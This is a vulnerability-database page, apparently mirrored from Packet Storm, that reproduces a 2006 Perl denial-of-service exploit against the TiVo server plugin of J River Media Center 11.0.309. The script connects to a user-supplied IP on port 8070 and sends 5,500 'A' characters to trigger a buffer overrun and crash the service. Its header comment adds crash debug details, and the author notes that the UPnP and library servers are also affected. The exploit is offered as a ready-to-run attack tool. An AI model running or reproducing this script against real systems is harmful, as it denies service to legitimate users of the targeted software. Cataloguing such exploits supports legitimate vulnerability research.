Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

jriver.txt

🗓️ 07 Sep 2006 00:00:00Reported by n00bType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00

Code
`#!/usr/bin/perl  
##Credit to n00b for finding this bug..^ ^  
############################################################################  
#Media Center 11 d0s exploit overly long string.  
#TiVo server plugin..Runs on port tcp :8070  
#Also J. River UPnP Server Version 1.0.34  
#is also afected by the same bug which is just a  
#dos exploit.As we know the port always changes for the  
#UPnP server so you may have to modify the proof of concept a little  
#This exploit will deny legitimate user's from using the service  
#We should see a error with the following msg Upon sucsessfull exploitation.  
#All 3 of the server plugin's will fail includin the library server which  
#is set to port :80 by default.The only debug info i was able to collect  
#at crash time is also provided with the proof of concept.  
#As you can see from the debug info provided we canot control any memory  
#Adresses.  
#Shout's to aelph and every-one who has helped me over the year's.  
#############################################################################  
# X Microsoft Visual C ++ Runtime Library  
#  
# Buffer overrun detected!  
#  
# C:\Program Files\J River\Media Center 11\Media center.exe  
#  
# A Buffer overrun has been detected which has corrupted the program's  
# internal state. The program cannot safely continue execution and must  
# be now terminated.  
# Bah fucking shame..  
##############################################################################  
#o/s info: win xp sp.2 Media Center 11.0.309 (not registered)  
# \\ DEBUG INFO //  
#  
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e edi=00000003  
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0 nv up ei pl nz na  
pe nc  
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202  
#SharedUserData!SystemCallStub+0x4:  
#7ffe0304 c3 ret  
##############################################################################  
  
print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00b \n";  
  
use IO::Socket;  
  
$ip = $ARGV[0];  
  
$payload = "\x41"x5500;  
  
if(!$ip)  
{  
  
die "you forgot the ip dumb nut\n";  
  
}  
  
$port = '8070';  
  
$protocol = 'tcp';  
  
  
$socket = IO::Socket::INET->new(PeerAddr=>$ip,  
PeerPort=>$port,  
Proto=>$protocol,  
Timeout=>'1') || die "Make sure service is running on the port\n";  
  
  
print $socket $payload;  
  
close($socket);  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Sep 2006 00:00Current
perl scriptdos exploittivo serverj. river upnp serverbuffer overrunremote exploit
25